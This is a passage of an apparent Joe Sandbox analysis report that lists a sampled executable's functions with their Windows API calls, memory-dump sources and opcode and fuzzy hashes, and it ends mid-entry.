                                                                  • Opcode ID: 052870857bfa72ab947d26449948855478e5cae35218fb9f14b28bc9c0a7baef
                                                                  • Instruction ID: 9e2ba5d2de790e7f94a179c288915ab566723441ed1914d39aa1340ec03e5c10
                                                                  • Opcode Fuzzy Hash: 052870857bfa72ab947d26449948855478e5cae35218fb9f14b28bc9c0a7baef
                                                                  • Instruction Fuzzy Hash: 5871B171500B449EDB35DF70C8519EBB7E5AF14346F40092FEAAA87242EA3A664CCF15
                                                                  Function 00458284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00458289
                                                                    • Part of subcall function 004513DC: __EH_prolog.LIBCMT ref: 004513E1
                                                                    • Part of subcall function 0045A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0045A598
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$CloseFind
                                                                  • String ID:
                                                                  • API String ID: 2506663941-0
                                                                  • Opcode ID: d66a00301321dd410eab65cfa0b2fd24035f3e430f2d3547ede2ee6d7bebc0eb
                                                                  • Instruction ID: 9ec7b46b34f3b3cb8f8cce9143c5b3cb7dfe2e8c2219a0cd5d0df401c6d03500
                                                                  • Opcode Fuzzy Hash: d66a00301321dd410eab65cfa0b2fd24035f3e430f2d3547ede2ee6d7bebc0eb
                                                                  • Instruction Fuzzy Hash: AB41B7719046589ADB20DB61CC55AEAB3B8AF00305F4404EFE84A67193EF795ECDCB14
                                                                  Function 004513E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004513E1
                                                                    • Part of subcall function 00455E37: __EH_prolog.LIBCMT ref: 00455E3C
                                                                    • Part of subcall function 0045CE40: __EH_prolog.LIBCMT ref: 0045CE45
                                                                    • Part of subcall function 0045B505: __EH_prolog.LIBCMT ref: 0045B50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: c9271ef009a8db66bcc40abec76facaa37b25fe872bcbb8986853538664fcb32
                                                                  • Instruction ID: d1129249129b5a377dcc3644edd3bfe66ad021a7d5edf9b9a2185fbcd57d9cbd
                                                                  • Opcode Fuzzy Hash: c9271ef009a8db66bcc40abec76facaa37b25fe872bcbb8986853538664fcb32
                                                                  • Instruction Fuzzy Hash: 744179B0905B409EE724CF3A8885AE6FBE5BF19304F50492FD5EE83282DB352658CB05
                                                                  Function 004513DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004513E1
                                                                    • Part of subcall function 00455E37: __EH_prolog.LIBCMT ref: 00455E3C
                                                                    • Part of subcall function 0045CE40: __EH_prolog.LIBCMT ref: 0045CE45
                                                                    • Part of subcall function 0045B505: __EH_prolog.LIBCMT ref: 0045B50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 9b1162e0d939993ce1b0894425ac01bf082e3b8cc409803b091269ca4c776340
                                                                  • Instruction ID: b8ab1fc6a39b08f789d1a7526eda17b9625a5acdad32cfdc9f7cd9bdd194d7dd
                                                                  • Opcode Fuzzy Hash: 9b1162e0d939993ce1b0894425ac01bf082e3b8cc409803b091269ca4c776340
                                                                  • Instruction Fuzzy Hash: 784166B0901B409EE724DF3A8885AE6FBE5BF19304F40492FD5EE83282DB752658CB15
                                                                  Function 0046B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0046B098
                                                                    • Part of subcall function 004513DC: __EH_prolog.LIBCMT ref: 004513E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: b5a6af4b8c2ebc81883cd7c8756bcf1e6126515b60100f8958a9a5d7005b3086
                                                                  • Instruction ID: 2efb623db7776a2fbc00c3fc7535acc9040f6d3260af0300df711d1cf375217d
                                                                  • Opcode Fuzzy Hash: b5a6af4b8c2ebc81883cd7c8756bcf1e6126515b60100f8958a9a5d7005b3086
                                                                  • Instruction Fuzzy Hash: 60319075C00249EBCF14DF55C951AEEB7B4AF05308F10449FE809B7252E7396E44CBA6
                                                                  Function 0047AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,00483A34), ref: 0047ACF8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID:
                                                                  • API String ID: 190572456-0
                                                                  • Opcode ID: 81d99f9e349b7d971ed00b9503bfd92bc7392e6911af0707aeb90dc5edde868b
                                                                  • Instruction ID: 53926d72e82dd0996f0c6bfd6e57fae1c3b984e935c318a8406b91ca10f0e530
                                                                  • Opcode Fuzzy Hash: 81d99f9e349b7d971ed00b9503bfd92bc7392e6911af0707aeb90dc5edde868b
                                                                  • Instruction Fuzzy Hash: A0113637A00225BF9B329E29EC408DF7396ABC4324716C626FC19AB344D738DC1197DA
                                                                  Function 00459215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 2e70dd7ee85fad3ce1bb266b6e6eddf1c91a43d9472704f01d0b3cfed48dd2b4
                                                                  • Instruction ID: 42228e866ed9150fa46af05a52d33e82917f0174f2fe3ef463a4074a461eba89
                                                                  • Opcode Fuzzy Hash: 2e70dd7ee85fad3ce1bb266b6e6eddf1c91a43d9472704f01d0b3cfed48dd2b4
                                                                  • Instruction Fuzzy Hash: 50018A33D00524E7CF11ABA9CD819DE7731AF88745F01455AFC157B213D6388D08C6A4
                                                                  Function 0047C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0047B136: RtlAllocateHeap.NTDLL(00000008,00483A34,00000000,?,0047989A,00000001,00000364,?,?,?,0045D984,?,?,?,00000004,0045D710), ref: 0047B177
                                                                  • _free.LIBCMT ref: 0047C4E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                  • Instruction ID: a6b37154d8266d684ee477a2d430337f65429d63e50ac19a245b72a69681a4cf
                                                                  • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                  • Instruction Fuzzy Hash: 3F01FE722003055BE331CF65D8859AAFBEDFB85370F25451EE598833C1EA34A905C778
                                                                  Function 0047B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,00483A34,00000000,?,0047989A,00000001,00000364,?,?,?,0045D984,?,?,?,00000004,0045D710), ref: 0047B177
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: b5eae646e15237eaa2e7d1ade6a8faa0c7021cfb4d0b06f46a97a70f104de8c5
                                                                  • Instruction ID: 03da258efebfde0d35af608cdb29ef0dc1c14063a4182792da9c81364ab4a6cc
                                                                  • Opcode Fuzzy Hash: b5eae646e15237eaa2e7d1ade6a8faa0c7021cfb4d0b06f46a97a70f104de8c5
                                                                  • Instruction Fuzzy Hash: 0FF0543254512567EB215A22AD19BDF7748EF417F0B98C227F80CAB290CB69DD0186ED
                                                                  Function 00473C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00473C3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID:
                                                                  • API String ID: 190572456-0
                                                                  • Opcode ID: 2557e0e0fa450facba80a0c0f7cda401dec04de4a45d0b28a4c8b96b2cf294bf
                                                                  • Instruction ID: dcae337b9a1f781e342ddc80993b5ff58c70efe69c161441028aac5634332e90
                                                                  • Opcode Fuzzy Hash: 2557e0e0fa450facba80a0c0f7cda401dec04de4a45d0b28a4c8b96b2cf294bf
                                                                  • Instruction Fuzzy Hash: 47F0A7332002169F8F135E69EC009DB779DEF01B227208526FA09E7290DB35DA20E7D4
                                                                  Function 00478E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 9015cc91ec64688e679caac9598be04c0cc7e56748bd110cc9650d34b1c8131d
                                                                  • Instruction ID: 92260528d3c519ad59b60facfb7183ab0d52cd21040f0ff910d128d53af606ac
                                                                  • Opcode Fuzzy Hash: 9015cc91ec64688e679caac9598be04c0cc7e56748bd110cc9650d34b1c8131d
                                                                  • Instruction Fuzzy Hash: 39E0E53128211557E67126229D0CBDF76489B417B4F11C12FBC0CE6281CF28CC0182ED
                                                                  Function 00455ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00455AC2
                                                                    • Part of subcall function 0045B505: __EH_prolog.LIBCMT ref: 0045B50A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 413c5bf2f3f0383a8ab4b6bd379cb9bc7e9dd667f08d3d68e55c9d38b6fd92b7
                                                                  • Instruction ID: 08de2dd4cf1773034bac283fc91358aff7383f38d79933c300dc140d05ae0a64
                                                                  • Opcode Fuzzy Hash: 413c5bf2f3f0383a8ab4b6bd379cb9bc7e9dd667f08d3d68e55c9d38b6fd92b7
                                                                  • Instruction Fuzzy Hash: D701D130400684DAD719E7B9C0017DEF7E4DF14308F50848FA45653283DBB81B08D7A7
                                                                  Function 0045A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0045A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6C4
                                                                    • Part of subcall function 0045A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6F2
                                                                    • Part of subcall function 0045A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6FE
                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0045A598
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1464966427-0
                                                                  • Opcode ID: 304d13e1cc537056baa7c7b35fa2770ae0bd04a8e4b67cfe5084f0f15d38b0b9
                                                                  • Instruction ID: d33cb5636303947e30e46ba987ca41f956a88ef87850eac9935f9c3a4cb6386b
                                                                  • Opcode Fuzzy Hash: 304d13e1cc537056baa7c7b35fa2770ae0bd04a8e4b67cfe5084f0f15d38b0b9
                                                                  • Instruction Fuzzy Hash: D9F0B431008380AACA2257B44801BCB7BD06F16327F048B4EF8F912197C26910AC8B27
                                                                  Function 00460E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00460E3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExecutionStateThread
                                                                  • String ID:
                                                                  • API String ID: 2211380416-0
                                                                  • Opcode ID: 4cb12d9258d9268c15c902d34c16b283b706c3e8fa6ca2cd7530921211909242
                                                                  • Instruction ID: d000a5c4a02254db7c26cda202486e081916168c9f6f6d9f3ada3c2e6747e6ed
                                                                  • Opcode Fuzzy Hash: 4cb12d9258d9268c15c902d34c16b283b706c3e8fa6ca2cd7530921211909242
                                                                  • Instruction Fuzzy Hash: CED0C210B0106516DA22372A68197FF29068FC671AF0D003FB54A576A3EA4E0C86A26F
                                                                  Function 0046A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0046A62C
                                                                    • Part of subcall function 0046A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0046A3DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                  • String ID:
                                                                  • API String ID: 1915507550-0
                                                                  • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                  • Instruction ID: 71871a91fe7ee7e6a29dad0e0978f07d639ccaf581358f7ed9feaae8fd31c3c6
                                                                  • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                  • Instruction Fuzzy Hash: 44D0A73020070876DF01AF22CC0296E7595EB10344F00C027BC81E5241FAB5D920995B
                                                                  Function 0046DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00461B3E), ref: 0046DD92
                                                                    • Part of subcall function 0046B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                    • Part of subcall function 0046B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                    • Part of subcall function 0046B568: IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                    • Part of subcall function 0046B568: TranslateMessage.USER32(?), ref: 0046B5AC
                                                                    • Part of subcall function 0046B568: DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                  • String ID:
                                                                  • API String ID: 897784432-0
                                                                  • Opcode ID: 0aae4d9ad9b622c1a76f790684c5a8f30d9644c42ffb42e19d112d49e47b4c4c
                                                                  • Instruction ID: 1ab268820c1cb12288dd416883c8a07deb5a00cc669bc26f2ec24bcc03d22465
                                                                  • Opcode Fuzzy Hash: 0aae4d9ad9b622c1a76f790684c5a8f30d9644c42ffb42e19d112d49e47b4c4c
                                                                  • Instruction Fuzzy Hash: 87D09E31244300BBD6012B56CD06F0B7AA6AF99B09F004569B285740B19672AD61DB1B
                                                                  Function 0046E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DloadProtectSection.DELAYIMP ref: 0046E5E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
